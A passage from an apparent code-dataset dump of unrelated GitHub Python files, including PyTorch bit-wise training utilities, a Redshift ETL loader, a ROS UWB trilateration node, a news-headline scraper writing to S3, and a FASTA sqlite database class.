F\n\n# keep the device info, cuda for gpu use\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef to_device(data, device):\n \"\"\"Move tensor(s) to chosen device\"\"\"\n if isinstance(data, (list, tuple)):\n return [to_device(x, device) for x in data]\n return data.to(device, non_blocking=True)\n\n\n\n@torch.no_grad()\ndef evaluate(model, val_loader):\n '''\n evaluate a model on val_loader data\n '''\n model.eval()\n outputs = [model.validation_step(batch) for batch in val_loader]\n return model.validation_epoch_end(outputs)\n\n\ndef get_lr(optimizer):\n '''\n return current learning rate of an optimizer\n '''\n for param_group in optimizer.param_groups:\n return param_group['lr']\n\ndef accuracy(outputs, labels):\n '''\n simple function to calculate accuracy\n '''\n _, preds = torch.max(outputs, dim=1)\n return torch.tensor(torch.sum(preds == labels).item() / len(preds))\n\n\nclass get_bit_representation(torch.autograd.Function):\n @staticmethod\n def forward(ctx, x):\n ctx.save_for_backward(x)\n return torch.sign(nn.ReLU()(x)) # ReLU return 0 if neg and x if not, sign returns 0 if 0 and 1 if pos\n\n @staticmethod\n def backward(ctx, grad_output): # custom grad identity function of the threshold\n x, = ctx.saved_tensors\n return grad_output\n\n\nclass get_sign(torch.autograd.Function):\n @staticmethod\n def forward(ctx, x):\n ctx.save_for_backward(x)\n return (-1) ** torch.sign(nn.ReLU()(x)) # returns 1 if 0 ( positif ) -1 if 0 ( negatif )\n\n @staticmethod\n def backward(ctx, grad_output): # custom grad identity function of the threshold\n x, = ctx.saved_tensors\n return -grad_output\n\n\ndef init_weight_bits(shape):\n a = np.sqrt(2 / np.prod(shape[:-1])) # He standard deviation\n nbits = shape[0]\n probs = a * np.random.normal(0, 1, shape) # get bit distribution\n\n # check exactly zero initialization ( proba <= 0 )\n # linear\n if len(shape) == 3:\n for i in range(shape[1]):\n for j in range(shape[2]):\n while np.all(probs[:-1, i, j] <= 0): # if all bits are 0 re calculate\n probs[:-1, i, j] = a * np.random.normal(0, 1, nbits - 1)\n\n # conv\n if len(shape) == 5:\n for in_channels in range(shape[3]):\n for out_channels in range(shape[4]):\n for i in range(shape[1]):\n for j in range(shape[2]):\n while np.all(probs[:-1, i, j, in_channels, out_channels] <= 0): # if all bits are 0 re calculate\n probs[:-1, i, j, in_channels, out_channels] = a * np.random.normal(0, 1, nbits - 1)\n\n return probs\n\n\ndef get_factor(k, target):\n current_std = np.std(k)\n\n if current_std == 0:\n print(\"standard deviation can't be zero\")\n return 1\n\n ampl = 1\n eps = 0.001\n min = 0\n max = ampl\n\n steps = 0\n while np.abs(current_std - target) / target > eps:\n qk = k * ampl\n current_std = np.std(qk)\n\n if current_std > target:\n max = ampl\n ampl = (max + min) / 2\n elif current_std < target:\n min = ampl\n ampl = (max + min) / 2\n steps += 1\n\n return ampl\n\n\ndef get_float_from_bits(signfunction, maskfunction, magnitude_block, sign_bit):\n \"\"\"\n returns the flaot value of the kernel\n \"\"\"\n if len(magnitude_block) == 0:\n magnitude = 1\n else:\n magnitude = 0\n for i in range(len(magnitude_block)): # for each magniture block we calculate the base 10 representation and sum them up\n magnitude += maskfunction.apply(magnitude_block[i]) * (2 ** i)\n # make kernel\n kernel = signfunction.apply(sign_bit) * magnitude # dont forget to multiply by the sign\n return kernel\n\n\ndef get_sparsity(k):\n \"\"\"\n returns the number of negative, zero and positive weights\n \"\"\"\n neg = np.count_nonzero(k < 0)\n zeros = np.count_nonzero(k == 0)\n pos = np.count_nonzero(k > 0)\n\n return neg, zeros, pos\n\n\ndef getNZP(net):\n\n \"\"\"\n returns the number of negative, zero and positive of a network net\n \"\"\"\n nsum = 0\n zsum = 0\n psum = 0\n\n for l in net.modules(): # for each module\n\n if isinstance(l, Conv2dBit) or isinstance(l, LinearBit): # if its an instance of Conv2Bit or Linear Bit\n neg, zero, pos = l.get_nzp() # get its nzp\n nsum += neg\n zsum += zero\n psum += pos\n\n return nsum, zsum, psum","repo_name":"abdxxw/Bit-wise-training-on-PyTorch","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34712802353","text":"from django.urls import path\n\nfrom .views import UnitList,UpdateBuilding, UpdateUnit\n\napp_name = 'building_app'\n\nurlpatterns = [\n path('/unit-list', UnitList.as_view(), name='unit_list'),\n path('/update-building', UpdateBuilding.as_view(), name='update_building'),\n path('/update-unit/', UpdateUnit.as_view(), name='update_unit'),\n]","repo_name":"mohammad-zavareh/building-management","sub_path":"building_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1974724942","text":"import configparser\nimport psycopg2\nfrom sql_queries import copy_table_queries, insert_table_queries\n\n\ndef load_staging_tables(cur, conn):\n '''\n This function lodas the data from S3 to the staging tables\n by excuting\n the COPY quiries\n '''\n for query in copy_table_queries:\n cur.execute(query)\n conn.commit()\n\n\ndef insert_tables(cur, conn):\n '''\n This function inserts the data from staging tables to the dimensional\n tables by excuting the INSERT INTO queries \n quiries\n '''\n for query in insert_table_queries:\n cur.execute(query)\n conn.commit()\n\n\ndef main():\n '''\n The main reads the configration file to connect to the Redshift cluster and \n calls the load and and insert functions\n '''\n \n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n \n load_staging_tables(cur, conn)\n insert_tables(cur, conn)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","repo_name":"ShorogNa/Data_Warhouse","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29891192508","text":"from typing import List\n\n\nclass Solution:\n def jump(self, nums: List[int]) -> int:\n n = len(nums)\n reachability = list(range(n))\n for i in range(n):\n k = min(nums[i]+1,n-i)\n for j in range(1,k):\n reachability[i+j] = min(1 + reachability[i],reachability[i+j])\n return reachability[-1]\n\nnums = [2,3,0,1,4] #breaks this!!\nout = Solution().jump(nums)\nprint(out)\n\n\n\n\"\"\"\nInteresting implemantation for setting multiple values to the array if they are the same...\n\nclass Solution:\n def jump(self, nums: List[int]) -> int:\n l=len(nums)\n if l==1: return 0\n dp = [0] * l\n f = 0\n for i, n in enumerate(nums):\n if i+n > f:\n dp[f + 1:i + n + 1] = [dp[i] + 1] * (i + n - f)\n f = i + n\n if i+n >=l-1: break\n return dp[-1]\n\n\n\"\"\"","repo_name":"Arnon120/leetcode","sub_path":"45. Jump Game II.py","file_name":"45. Jump Game II.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18340337886","text":"from typing import List\n\nimport torch\nimport torch.nn as nn\n\n\nclass MultiClassNet(nn.Module):\n def __init__(self, input_channel: int, output_channel: int,\n channel_list: List[int] = None, dropout_p: float = 0.1):\n \"\"\"\n This Module is designed as a customized network for softmax distribution,\n all full connected layers and activation layer can be redesigned.\n\n Args:\n input_channel: the dimension number of design matrix, aka number of signals.\n output_channel: the dimension number of predicted values, aka number of values we want to predict.\n channel_list: customize the intermediate channels for the first two layers, should have length=2,\n because there are totally three layers in network.\n dropout_p: dropout ratio for Dropout layer\n \"\"\"\n super(MultiClassNet, self).__init__()\n self.input_channel = input_channel\n self.output_channel = output_channel\n if channel_list:\n self.channel_list = channel_list\n else:\n # initialize default channel_list\n self.channel_list = [input_channel * 2, output_channel * 2]\n self.fc1 = torch.nn.Linear(input_channel, self.channel_list[0])\n self.activation1 = nn.ReLU()\n self.fc2 = torch.nn.Linear(self.channel_list[0], self.channel_list[1])\n self.activation2 = nn.ReLU()\n self.fc3 = torch.nn.Linear(self.channel_list[1], output_channel)\n self.activation3 = nn.LogSoftmax(dim=1)\n self.dropout = nn.Dropout(p=dropout_p)\n\n def forward(self, x: torch.autograd.Variable) -> torch.autograd.Variable:\n \"\"\"\n Let input x go though the network in a customized sequence,\n all layers can be reordered, make sure self.activation3 is the last layer\n\n Args:\n x: input value\n Returns: network output\n \"\"\"\n x = self.fc1(x)\n x = self.activation1(x)\n x = self.dropout(x)\n x = self.fc2(x)\n x = self.activation2(x)\n x = self.dropout(x)\n x = self.fc3(x)\n x = self.activation3(x)\n return x\n\n","repo_name":"garyzccisme/ml-toolkit","sub_path":"feedforward_neural_network/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33286123151","text":"import sys\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\n\nnums = list(i for i in range(1, n+1))\nanswers = []\n\ndef dfs(result, m):\n if len(result) == m:\n result = list(str(i) for i in result)\n answers.append(\" \".join(result))\n\n return\n\n for num in nums:\n result.append(num)\n dfs(result, m)\n result.pop()\n\nfor num in nums:\n # 케이스의 초기 조건\n result = [num]\n dfs(result, m)\n\nfor ans in answers:\n print(ans)\n ","repo_name":"chulhee23/today_ps","sub_path":"BOJ/15000-19999/15651.py","file_name":"15651.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"33386710320","text":"\r\n\r\nfrom collections import deque\r\nfrom pprint import pprint\r\n\r\nrealinput= open('input.10.txt','r',newline='\\n') \r\nlines=[x.strip() for x in realinput.readlines()]\r\n\r\ntstinput = '''[({(<(())[]>[[{[]{<()<>>\r\n[(()[<>])]({[<{<<[]>>(\r\n{([(<{}[<>[]}>{[]{[(<()>\r\n(((({<>}<{<{<>}{[]{[]{}\r\n[[<[([]))<([[{}[[()]]]\r\n[{[{({}]{}}([{[{{{}}([]\r\n{<[[]]>}<{[{[{[]{()[[[]\r\n[<(<(<(<{}))><([]([]()\r\n<{([([[(<>()){}]>(<<{{\r\n<{([{{}}[<[[[<>{}]]]>[]]\r\n'''\r\n#lines=[x.strip() for x in tstinput.splitlines()]\r\n#pprint(lines)\r\n\r\nopenchars=('(', '{', '[', '<')\r\nclosechars=(')', '}', ']', '>')\r\nlookup=dict(zip(closechars,openchars))\r\nscore={')':3, \r\n ']':57,\r\n '}': 1197,\r\n '>':25137 }\r\n\r\ndef isNotValid(line):\r\n stk = deque()\r\n stk2 = deque()\r\n for c in line:\r\n if c in openchars:\r\n stk.append(c)\r\n elif c in closechars:\r\n d = stk.pop()\r\n # print(c,d)\r\n if lookup[c] != d : \r\n return c\r\n else:\r\n print(\"really bad\")\r\n return False\r\n\r\n\r\ndef fix(line):\r\n stk = deque()\r\n for c in line:\r\n if c in openchars:\r\n stk.append(c)\r\n elif c in closechars:\r\n d = stk.pop()\r\n else:\r\n print(\"really bad\")\r\n return stk\r\n# isValid(lines[0])\r\nfscore=0\r\nfor line in lines:\r\n c=isNotValid(line)\r\n if c:\r\n print(c)\r\n fscore = fscore + score[c]\r\n\r\nprint('part1: ',fscore)\r\nlines = [l for l in lines if not isNotValid(l)]\r\n\r\nscore2 = {\r\n '(': 1 , \r\n '[': 2 ,\r\n '{': 3 ,\r\n '<': 4 }\r\n\r\nresult=[]\r\nfor line in lines:\r\n fscore=0\r\n f =fix(line)\r\n #rint (line, ' ', f)\r\n while len(f):\r\n fscore= 5*fscore + score2[f.pop()]\r\n result.append(fscore)\r\n\r\nr = sorted(result)\r\nprint(r[int(len(r)/2)])\r\n","repo_name":"zmola/aoc","sub_path":"2021/day.10.py","file_name":"day.10.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7874465175","text":"# -*- coding: utf-8 -*-\nimport os\nfrom sqlalchemy import Table\nfrom models.mysql.system import db_engine, meta\n\nroot_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\ndef main():\n full_name = os.path.join(root_path, 'models/mysql.py')\n\n with open(full_name, 'w') as f:\n f.write('# -*- coding: utf-8 -*-\\r\\n\\r\\n')\n f.write('from sqlalchemy import Table, select\\r\\n')\n f.write('from utils.my_sql import Mysql\\r\\n\\r\\n')\n f.write('mysql_obj = Mysql()\\r\\n')\n f.write('meta = mysql_obj.meta\\r\\n')\n f.write('db_engine = mysql_obj.db_engine\\r\\n\\r\\n')\n\n table_list = db_engine.table_names()\n print(table_list)\n for table_name in table_list:\n tmp_table = Table(table_name, meta, autoload=True, autoload_with=db_engine)\n # 表注释\n f.write('# ' + tmp_table.comment.replace(r'\\r\\n', '') + '\\r\\n')\n # 定义表\n f.write('{table_name} = Table(\"{table_name}\", meta, autoload=True, autoload_with=db_engine)\\r\\n\\r\\n'.format(table_name=table_name))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jicao56/normalAdmin","sub_path":"bin/models_mysql_update.py","file_name":"models_mysql_update.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35292844316","text":"from datetime import datetime, timedelta\nimport boto3\nfrom bs4 import BeautifulSoup\nimport requests\nimport csv\n\ntiempoURL = \"https://www.eltiempo.com\"\npublimetroURL = \"https://www.publimetro.co\"\n\ndef dowloand_structure(periodic):\n today = datetime.now()\n year=today.year\n month=today.month\n day=today.day\n archivo=f'{periodic}.html'\n ruta=f'headlines/raw/periodico={periodic}/year={year}/month={month}/day={day}/{periodic}.html'\n s3 = boto3.resource('s3')\n s3.meta.client.download_file('newspaperstructure', ruta, f'/tmp/{periodic}.html')\n\ndowloand_structure('El_Tiempo')\ndowloand_structure('Publimetro')\nfile = open(r'/tmp/El_Tiempo.html',\"r\",encoding='utf-8')\ntiempoBS = BeautifulSoup(file.read(), 'html.parser')\nfile = open(r'/tmp/Publimetro.html',\"r\",encoding='utf-8')\npublimetroBS = BeautifulSoup(file.read(), 'html.parser')\n\n\n\ndef normalize(s): #Function to \n replacements = (\n (\"á\", \"a\"),\n (\"é\", \"e\"),\n (\"í\", \"i\"),\n (\"ó\", \"o\"),\n (\"ú\", \"u\"),\n )\n for a, b in replacements:\n s = s.replace(a, b).replace(a.upper(), b.upper())\n return s\n\n# Lists\ntitles = list()\ncategories = list()\nurls = list()\n\ndef newsTitles (titleClass, nested_a = False):\n for title in titleClass:\n if nested_a:\n titleScraped = titles.find('a')\n titles.append(titleScraped.text)\n else: titles.append(title.text)\n\ndef newsCategories (categoryClass, newspaper = \"\", nested_a = False):\n for category in categoryClass:\n if nested_a:\n scrapedCategory = category.find('a')['href']\n else:\n scrapedCategory = category.get('href','')\n txt = scrapedCategory.split(sep='/')\n if newspaper == \"PB\":\n if len(txt) > 2:\n if txt[0] == \"https:\": categories.append(\"banner publicitario\")\n else: categories.append(txt[1])\n else: categories.append(\"No category\")\n else: categories.append(txt[1]+\"/\"+txt[2])\n\n\ndef newsUrls (urlClass, newspaper = \"\", nested_a = False):\n for url in urlClass: \n if nested_a:\n scrapedURL = url.find('a')['href']\n else:\n scrapedURL = url.get('href','')\n if newspaper == \"ET\": urls.append(tiempoURL+scrapedURL)\n else: urls.append(publimetroURL+scrapedURL)\n\n\ndef generateCSV(categories, titles, urls, fileName):\n print(len(categories),len(titles), len(urls))\n fields = ['Category', 'Title', 'Url']\n rows = []\n\n for i in range(len(categories)):\n row = [categories[i], titles[i], urls[i]]\n rows.append(row)\n\n with open(f'/tmp/{fileName}', 'w', encoding=\"utf-8\") as f:\n write = csv.writer(f)\n write.writerow(fields)\n write.writerows(rows)\n print(\"Scraping successful.\\nFinal file: \", fileName)\n\n titles.clear()\n categories.clear()\n urls.clear()\n\ndef saveS3(filename):\n nameNews=filename.replace('.csv','')\n today = datetime.now()\n year=today.year\n month=today.month\n day=today.day\n urlsave= f'headlines/final/periodico={nameNews}/year={year}/month={month}/day={day}/{filename}'\n s3 = boto3.resource('s3')\n s3.meta.client.upload_file(f'/tmp/{filename}', 'csvnews',urlsave)\n\n\n\"\"\" El Tiempo \"\"\"\ncommunET = tiempoBS.find_all('a', class_='title')\n\n# Begins the scraping for \"El Tiempo\"\nnewsTitles(communET)\nnewsCategories(communET, \"ET\")\nnewsUrls(communET, \"ET\")\nfilename='El_Tiempo.csv'\ngenerateCSV(categories, titles, urls, filename)\nsaveS3(filename)\n\n\"\"\" Publimetro \"\"\"\ntitleClassv1 = publimetroBS.find_all('a', class_='headline')\ntitleClassv2 = publimetroBS.find_all('a', class_='card-list--headline-link')\ntitleClassv3 = publimetroBS.find_all('a', class_='sm-promo-headline')\ntitleClassv4 = publimetroBS.find_all('div', class_='results-list--headline-container')\ntitleClass = [titleClassv1, titleClassv2, titleClassv3, titleClassv4]\n\n# Begins the scraping for \"Publimetro\"\nneasted = False\nfor titleList in titleClass:\n if titleClass[3] == True: neasted = True\n newsTitles(titleList, nested_a = neasted)\n newsCategories(titleList, newspaper=\"PB\", nested_a = neasted)\n newsUrls(titleList, nested_a = neasted)\nfilename='Publimetro.csv'\ngenerateCSV(categories, titles, urls,filename)\nsaveS3(filename)\n\n","repo_name":"FelipeVelasquezP/ETL_Scraping_Kafla","sub_path":"Punto 1/make_CSV_newspaper.py","file_name":"make_CSV_newspaper.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73721252967","text":"import rospy\nimport tf\nimport localization as lx\nimport serial\n\ndef get_transform(id):\n try:\n (trans,rot) = listener.lookupTransform('/map', id, rospy.Time(0))\n return trans\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n pass\n\ndef get_tag_location(anchors, ranges, transforms):\n P = lx.Project(mode=\"3D\",solver=\"LSE\")\n\n #define anchor locations\n for i in range(REQ_ANCHOR):\n P.add_anchor(anchors[i], transforms[i])\n t, label = P.add_target()\n\n #define anchor ranges\n for i in range(REQ_ANCHOR):\n t.add_measure(anchors[i], ranges[i])\n\n P.solve()\n B = t.loc\n return {'x':B.x, 'y':B.y, 'z':B.z}\n\ndef is_listed(anchors, id):\n for anchor in anchors:\n if anchor == id:\n return True\n else:\n pass\n\ndef get_serial_data():\n start = ser.read()\n # return ser.readline().strip('$\\r\\n').split(',')\n # expected data from the serial port is: $,,\\r\\n\n if start == '$':\n parsed_data = ser.readline().strip('\\r\\n').split(',')\n # anchor id is stored in index 0 - parsed_data[0]\n # range is stored in index 1 - parsed_data[1]\n return parsed_data\n else:\n return None\n\nif __name__ == '__main__':\n\n rospy.init_node('ros_dwm1000')\n listener = tf.TransformListener()\n start_time = rospy.get_time()\n\n #create rosparameters\n MIN_RANGE = rospy.get_param('/ros_dwm1000/min_range', 0.5)\n MAX_RANGE = rospy.get_param('/ros_dwm1000/max_range', 10.0)\n REQ_ANCHOR = rospy.get_param('/ros_dwm1000/req_anchor', 3)\n FRAME_ID = rospy.get_param('/ros_dwm1000/frame_id', 'uwb_tag')\n SERIAL_PORT = rospy.get_param('/ros_dwm1000/serial_port', '/dev/ttyUSB0')\n\n #rosparam logs just to make sure parameters kicked in\n rospy.loginfo(\"%s is %s\", rospy.resolve_name('/ros_dwm1000/min_range'), MIN_RANGE)\n rospy.loginfo(\"%s is %s\", rospy.resolve_name('/ros_dwm1000/max_range'), MAX_RANGE)\n rospy.loginfo(\"%s is %s\", rospy.resolve_name('/ros_dwm1000/req_anchor'), REQ_ANCHOR)\n rospy.loginfo(\"%s is %s\", rospy.resolve_name('/ros_dwm1000/frame_id'), FRAME_ID)\n rospy.loginfo(\"%s is %s\", rospy.resolve_name('/ros_dwm1000/serial_port'), SERIAL_PORT)\n\n ser = serial.Serial(SERIAL_PORT, 115200)\n ser.timeout = None\n rospy.loginfo(\"Connected to %s\", ser.portstr)\n\n #lists to store anchors found\n ranges = []\n anchors = []\n transforms = []\n anchors_found = 0\n\n while not rospy.is_shutdown():\n #get the stream of data from the tag through the serial port\n parsed_data = get_serial_data()\n\n # print parsed_data\n if None != parsed_data:\n #check if the current range is within specified distance\n if MIN_RANGE < float(parsed_data[1]) < MAX_RANGE:\n #append respective arrays of the anchor found\n #list of anchor IDs found\n anchors.append(parsed_data[0])\n #list of distance between tag and anchors found\n ranges.append(parsed_data[1])\n #list of static TFs of the anchors found.\n transforms.append(get_transform(parsed_data[0]))\n anchors_found += 1\n\n #perform trilateration once enough anchors have been found\n if anchors_found == REQ_ANCHOR:\n #do trilateration\n pos = get_tag_location(anchors,ranges,transforms)\n\n #broadcast the transform\n br = tf.TransformBroadcaster()\n br.sendTransform((pos['x'], pos['y'], pos['z']),\n tf.transformations.quaternion_from_euler(0, 0, 0),\n rospy.Time.now(),\n FRAME_ID,\n \"map\")\n\n #TODO: Publish pos as geometry_msgs/PoseWithCovarianceStamped for EKF and only broadcast TF as an option.\n\n # clear lists once trilateration is done for the next cycle\n anchors_found = 0\n ranges = []\n transforms = []\n anchors = []\n","repo_name":"linorobot/ros_dwm1000","sub_path":"scripts/localize.py","file_name":"localize.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"53"} +{"seq_id":"6670900106","text":"import sqlite3\r\nimport os\r\nfrom .fasta_parser import FastaParser\r\nfrom pathlib import Path\r\n\r\nSUPER_ID = 0\r\nCLASS_ID = 1\r\nFAMILY_ID = 2\r\nSUBFAM_ID = 3\r\nGENUS_ID = 4\r\nSPECIES = 5\r\nFACTOR = 6\r\nCLASSIFICATION = 7\r\nSEQUENCE = 8\r\nCLASS_SEQ = 9\r\nFAMILY_SEQ = 10\r\nSUBFAM_SEQ = 11\r\n\r\nclass FastaDB:\r\n \"\"\"Database class which creates a sqlite database from fasta files \r\n and provides access to it \r\n\r\n \"\"\"\r\n\r\n def __init__(self, path):\r\n \"\"\"Constructor of FastaDB class, creates new sqlite database or connects to\r\n existing one\r\n \r\n Arguments:\r\n path {Path} -- path to the location where the database is or will be stored\r\n (if not created yet)\r\n\r\n Attributes:\r\n connection {connection object} -- represents the database\r\n cursor {cursor object} -- cursor to call execute methods on to perform SQL commands \r\n map {dict} -- representation of the name2ID.txt file, maps tf name to ID\r\n \"\"\"\r\n\r\n self.connection = sqlite3.connect(str(path))\r\n self.cursor = self.connection.cursor()\r\n self.map = {}\r\n # initialize map from name2ID file\r\n with open('src/fastas/name2ID.txt', 'r') as map_reader:\r\n for line in map_reader:\r\n nameToID = line.split(';')\r\n # make sure all names have the same case\r\n nameToID[0] = nameToID[0].upper()\r\n self.map[nameToID[0]] = nameToID[1][:len(nameToID[1])-len(\"\\n\")]\r\n \r\n def build_table(self):\r\n \"\"\"Creates the database table \r\n \r\n Table consists of:\r\n ID {integer} -- 5 values/columns\r\n species {text} -- species name\r\n factor {text} -- tf name\r\n classification {text} -- class e.g mammalia\r\n sequence {text} -- unaligned sequence of species tf\r\n class_seq {text} -- level 2 aligned\r\n family_seq {text} -- level 3 aligned\r\n subfam_seq {text} -- level 4 aligned\r\n PRIMARY KEY -- full ID + species name (unique entry)\r\n \"\"\"\r\n\r\n sql_name = \"\"\"CREATE TABLE IF NOT EXISTS fastas(\r\n super_id integer,\r\n class_id integer,\r\n family_id integer,\r\n subfam_id integer,\r\n genus_id integer,\r\n species text,\r\n factor text,\r\n classification text,\r\n sequence text,\r\n class_seq text,\r\n family_seq text,\r\n subfam_seq text,\r\n PRIMARY KEY(super_id, class_id, family_id, subfam_id, genus_id, species))\"\"\"\r\n self.cursor.execute(sql_name)\r\n # fill database with values\r\n self.populate()\r\n # save database via commit\r\n self.connection.commit()\r\n \r\n def factorToID(self, factor):\r\n \"\"\"gets corresponding ID to tf name\r\n \r\n Arguments:\r\n factor {string} -- name of transcription factor\r\n \r\n Returns:\r\n ids [list] -- full ID as array\r\n \"\"\"\r\n \r\n # fasta files are not consistent in their naming of transcription factors\r\n # make sure case matches \r\n factor = factor.upper() \r\n # try to match a factor in map\r\n while(factor not in self.map and len(factor) != 1):\r\n # reduce name each time by one place and try again until match is found\r\n factor = factor[:len(factor)-1]\r\n ids = self.map[factor].split('.')\r\n return ids\r\n\r\n def insert_query(self, fasta):\r\n \"\"\"takes fasta datum object and inserts its values into the database\r\n \r\n Arguments:\r\n fasta {Fasta} -- fasta datum\r\n \"\"\"\r\n\r\n arguments = \"(super_id, class_id, family_id, subfam_id, genus_id, species, factor, sequence, classification)\"\r\n # only insert if primary key entry does not exist yet\r\n query = \"INSERT OR IGNORE into fastas \" + arguments + \" VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\"\r\n # use tf name to get full ID including level 5\r\n ids = self.factorToID(fasta.get_factor())\r\n # execute insert query\r\n self.cursor.execute(query, (ids[0], ids[1], ids[2], ids[3], ids[4], fasta.get_fullspecies(), fasta.get_factor(), fasta.get_sequence(), fasta.get_class()))\r\n\r\n def update_query(self, fasta, size):\r\n \"\"\"update entries with sequences from aligned fasta files\r\n \r\n Arguments:\r\n fasta {Fasta} -- aligned fasta datum\r\n size {int} -- length of the id, used to get corresponding column (level) \r\n \"\"\"\r\n\r\n # make sure the corresponding entry does exist, if not create a new entry\r\n self.insert_query(fasta)\r\n begin = \"UPDATE fastas SET\"\r\n mid = \"WHERE super_id = ? AND class_id = ? AND family_id = ? AND subfam_id = ? AND genus_id = ?\"\r\n end = \"AND species = ?\"\r\n ids = self.factorToID(fasta.get_factor())\r\n # get correct column\r\n if size == 2:\r\n query = begin + \" class_seq = ? \" + mid + \" \" + end\r\n elif size == 3:\r\n query = begin + \" family_seq = ? \" + mid + \" \" + end\r\n elif size == 4: \r\n query = begin + \" subfam_seq = ? \" + mid + \" \" + end\r\n # execute update query\r\n self.cursor.execute(query, (fasta.get_sequence(), ids[0], ids[1], ids[2], ids[3], ids[4], fasta.get_fullspecies()))\r\n \r\n\r\n def fillTable(self, path, aligned):\r\n \"\"\"iterates over all fasta files in given directory and inserts them\r\n or updates their entries one by one \r\n \r\n Arguments:\r\n path {Path} -- path where fasta files are stored\r\n aligned {bool} -- true if aligned, false if not\r\n \"\"\"\r\n\r\n # iterate over all files in path directory\r\n for filename in path.iterdir():\r\n fn = str(filename)\r\n # creates new FastaParser object for file\r\n parser = FastaParser(fn)\r\n fn = filename.name\r\n fn = fn[:len(fn)-len(\".fasta\")]\r\n ids = fn.split('.')\r\n size = len(ids)\r\n # for every fasta datum in file\r\n for f in parser:\r\n # update aligned files, insert non-aligned\r\n if aligned:\r\n self.update_query(f, size)\r\n else:\r\n self.insert_query(f)\r\n\r\n def populate(self):\r\n \"\"\"small helper method that calls fillTable two times: non-aligned and\r\n aligned\r\n\r\n \"\"\"\r\n\r\n self.fillTable(Path('src/fastas/files'), False)\r\n self.fillTable(Path('src/fastas/files_aligned'), True)\r\n\r\n def writeToFile(self, fpath, column):\r\n \"\"\"creates a new fasta file and fills it with data where the cursor points to\r\n \r\n Arguments:\r\n fpath {Path} -- path where output file will be created\r\n column {int} -- column of sequence which is asked for (8-11 are possible values)\r\n \r\n Returns:\r\n fetch [bool] -- true if file was successfully created, false if not\r\n \"\"\"\r\n\r\n # delete file if it already exists\r\n if fpath.is_file():\r\n fpath.unlink()\r\n filename = str(fpath)\r\n fetch = False\r\n # write to file row for row\r\n for row in self.cursor:\r\n if not fetch:\r\n print(\"Generating file \" + filename[4:] + \" at ./\" + filename[:3])\r\n fetch = True\r\n with open(filename, 'a') as f:\r\n # description line\r\n f.write('>'+row[SPECIES]+\"_\"+row[FACTOR]+\"_\"+row[CLASSIFICATION]+'\\n')\r\n # sequence line\r\n f.write(row[column]+'\\n')\r\n return fetch\r\n\r\n def alignedQuery(self, ids, id_len):\r\n \"\"\"Takes and ID and creates an aligned query from it, which can then\r\n be used to get the corresponding data from the database\r\n \r\n Arguments:\r\n ids {list} -- ID of the node which is asked for\r\n id_len {int} -- length of the id, used to get the correct column\r\n \r\n Returns:\r\n query [list] -- aligned query \r\n \"\"\"\r\n\r\n path = ids[0]+'.'+ids[1]\r\n query = \" IS NOT NULL AND class_id=?\"\r\n # two digits\r\n if id_len == CLASS_ID:\r\n query = \" AND class_seq\" + query\r\n return (query, (ids[0],ids[1]), CLASS_SEQ, path)\r\n path += '.'+ids[2]\r\n query += \" AND family_id=?\"\r\n # three digits\r\n if id_len == FAMILY_ID:\r\n query = \" AND family_seq\" + query\r\n return (query, (ids[0],ids[1],ids[2]), FAMILY_SEQ, path)\r\n path += '.'+ids[3]\r\n query += \" AND subfam_id=?\"\r\n # four digits\r\n if id_len == SUBFAM_ID:\r\n # fourth digit is not a zero -> level 4 aligned\r\n if ids[3] != '0':\r\n query = \" AND subfam_seq\" + query\r\n return (query, (ids[0],ids[1],ids[2],ids[3]), SUBFAM_SEQ, path)\r\n else:\r\n # fourth digit is a zero -> level 3 aligned\r\n query = \" AND family_seq\" + query\r\n return (query, (ids[0],ids[1],ids[2],ids[3]), FAMILY_SEQ, path)\r\n path += '.'+ids[4]\r\n query += \" AND genus_id=?\"\r\n # five digits\r\n if id_len == GENUS_ID:\r\n # fourth digit is not a zero -> level 4 aligned\r\n if ids[3] != '0':\r\n query = \" AND subfam_seq\" + query\r\n return (query, (ids[0],ids[1],ids[2],ids[3],ids[4]), SUBFAM_SEQ, path)\r\n else:\r\n # fourth digit is a zero -> level 3 aligned\r\n query = \" AND family_seq\" + query\r\n return (query, (ids[0],ids[1],ids[2],ids[3],ids[4]), FAMILY_SEQ, path)\r\n\r\n def unalignedQuery(self, ids, id_len):\r\n \"\"\"Takes and ID and creates a non-aligned query from it, which can then\r\n be used to get the corresponding data from the database\r\n \r\n Arguments:\r\n ids {list} -- ID of the node which is asked for\r\n id_len {int} -- length of the id, used to get the correct column\r\n 